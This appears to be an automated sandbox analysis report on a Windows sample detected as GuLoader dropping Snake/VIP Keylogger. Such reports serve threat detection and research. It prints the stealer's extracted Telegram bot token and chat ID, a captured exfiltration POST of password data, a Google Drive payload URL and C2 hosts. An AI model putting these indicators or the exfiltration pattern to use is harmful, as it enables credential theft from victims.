Edit tour

Windows Analysis Report
rJustificante67.exe

Overview

General Information

Sample name:	rJustificante67.exe
Analysis ID:	1617433
MD5:	96bc48e7cc38d731e7e2c25f3f80a88e
SHA1:	bd30afd2f438928b3cb98d9f74766f1e401db091
SHA256:	79714172680d9fd5b1d49fc518abe9cef9200194a04b6611466beccb28c31728
Tags:	exenjratuser-Porcupine
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious PE digital signature

Joe Sandbox ML detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

rJustificante67.exe (PID: 5876 cmdline: "C:\Users\user\Desktop\rJustificante67.exe" MD5: 96BC48E7CC38D731E7E2C25F3F80A88E)

rJustificante67.exe (PID: 6776 cmdline: "C:\Users\user\Desktop\rJustificante67.exe" MD5: 96BC48E7CC38D731E7E2C25F3F80A88E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0", "Chat_id": "7618581100", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.3926681535.0000000032F1A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2422615423.000000000331C000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000003.00000002.3906023015.000000000185C000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: rJustificante67.exe PID: 6776	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rJustificante67.exe PID: 6776	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 3 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T23:09:25.328868+0100	2803305	3	Unknown Traffic	192.168.2.5	49873	104.21.64.1	443	TCP
2025-02-17T23:09:26.168408+0100	2803305	3	Unknown Traffic	192.168.2.5	49880	104.21.64.1	443	TCP
2025-02-17T23:09:27.035919+0100	2803305	3	Unknown Traffic	192.168.2.5	49886	104.21.64.1	443	TCP
2025-02-17T23:09:27.873644+0100	2803305	3	Unknown Traffic	192.168.2.5	49893	104.21.64.1	443	TCP
2025-02-17T23:09:28.696803+0100	2803305	3	Unknown Traffic	192.168.2.5	49899	104.21.64.1	443	TCP
2025-02-17T23:09:29.538363+0100	2803305	3	Unknown Traffic	192.168.2.5	49905	104.21.64.1	443	TCP
2025-02-17T23:09:30.353340+0100	2803305	3	Unknown Traffic	192.168.2.5	49911	104.21.64.1	443	TCP
2025-02-17T23:09:31.211671+0100	2803305	3	Unknown Traffic	192.168.2.5	49917	104.21.64.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T23:09:23.488238+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49858	132.226.247.73	80	TCP
2025-02-17T23:09:24.706949+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49858	132.226.247.73	80	TCP
2025-02-17T23:09:25.613293+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49858	132.226.247.73	80	TCP
2025-02-17T23:09:26.425704+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49858	132.226.247.73	80	TCP
2025-02-17T23:09:27.300741+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49858	132.226.247.73	80	TCP
2025-02-17T23:09:28.144603+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49858	132.226.247.73	80	TCP
2025-02-17T23:09:28.956969+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49858	132.226.247.73	80	TCP
2025-02-17T23:09:29.800797+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49858	132.226.247.73	80	TCP
2025-02-17T23:09:30.613212+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49858	132.226.247.73	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T23:09:18.774047+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49826	172.217.18.14	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T23:09:39.053659+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49970	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T23:09:32.131584+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49922	149.154.167.220	443	TCP

HTTP traffic detected: POST /bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendDocument?chat_id=7618581100&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd4f75dbc47cddHost: api.telegram.orgContent-Length: 582

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 17 Feb 2025 22:09:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: rJustificante67.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032EF1000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20a
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendDocument?chat_id=7618
Source: rJustificante67.exe, 00000003.00000003.2459334272.00000000028D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032FD4000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3926681535.0000000033005000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3926681535.0000000032F1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032FD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: rJustificante67.exe, 00000003.00000002.3907242977.0000000002868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: rJustificante67.exe, 00000003.00000002.3907242977.0000000002868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/n#_
Source: rJustificante67.exe, 00000003.00000002.3907744649.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3907242977.00000000028A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV
Source: rJustificante67.exe, 00000003.00000002.3907242977.00000000028BD000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000003.2493211714.00000000028D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/M
Source: rJustificante67.exe, 00000003.00000002.3907242977.00000000028BD000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000003.2493211714.00000000028D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/a
Source: rJustificante67.exe, 00000003.00000003.2459334272.00000000028D6000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3907242977.00000000028A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV&export=download
Source: rJustificante67.exe, 00000003.00000002.3907242977.00000000028BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV&export=download/
Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032EAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032EF1000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3926681535.0000000032EAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: rJustificante67.exe, 00000003.00000003.2459334272.00000000028D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: rJustificante67.exe, 00000003.00000003.2459334272.00000000028D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: rJustificante67.exe, 00000003.00000003.2459334272.00000000028D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: rJustificante67.exe, 00000003.00000003.2459334272.00000000028D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: rJustificante67.exe, 00000003.00000003.2459334272.00000000028D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000033005000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3926681535.0000000032F1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000033005000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000033000000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922

Source: unknown	HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.5:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.5:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49922 version: TLS 1.2

Source: C:\Users\user\Desktop\rJustificante67.exe

Code function: 0_2_00405295 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405295

Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 0_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_0040331C
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		3_2_0040331C

Source: C:\Users\user\Desktop\rJustificante67.exe

File created: C:\Windows\resources\0809

Source: 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0", "Chat_id": "7618581100", "Version": "4.4"}
Source: rJustificante67.exe.6776.3.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendMessage"}

Source: rJustificante67.exe	Virustotal: Detection: 33%			Perma Link
Source: rJustificante67.exe	ReversingLabs: Detection: 32%

Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_356B8790 CryptUnprotectData,		3_2_356B8790
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_356B8EF1 CryptUnprotectData,		3_2_356B8EF1

Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 0_2_00402706 FindFirstFileW,	0_2_00402706
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405731
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 0_2_004061E5 FindFirstFileW,FindClose,	0_2_004061E5
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_00402706 FindFirstFileW,	3_2_00402706
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	3_2_00405731
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_004061E5 FindFirstFileW,FindClose,	3_2_004061E5

Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 0266F45Dh	3_2_0266F2C0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 0266F45Dh	3_2_0266F4AC
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 0266FC19h	3_2_0266F961
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FB3308h	3_2_34FB2EF0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FB2D41h	3_2_34FB2A90
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FB0D0Dh	3_2_34FB0B30
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FB16F8h	3_2_34FB0B30
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FBF781h	3_2_34FBF4D8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FBF329h	3_2_34FBF080
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_34FB0853
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_34FB0040
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FBEED1h	3_2_34FBEC28
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FBD069h	3_2_34FBCDC0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FBFBD9h	3_2_34FBF930
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FB3308h	3_2_34FB2EEB
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FBDD71h	3_2_34FBDAC8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_34FB0673
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FBD919h	3_2_34FBD670
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FB3308h	3_2_34FB3236
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FBD4C1h	3_2_34FBD218
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FBEA79h	3_2_34FBE7D0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FBE621h	3_2_34FBE378
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 34FBE1C9h	3_2_34FBDF20
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B7EB5h	3_2_356B7B78
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B9280h	3_2_356B8FB0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BC82Eh	3_2_356BC560
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B0FF1h	3_2_356B0D48
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B2A01h	3_2_356B2758
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BE81Eh	3_2_356BE550
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B55D1h	3_2_356B5328
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B79C9h	3_2_356B7720
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BB5EEh	3_2_356BB320
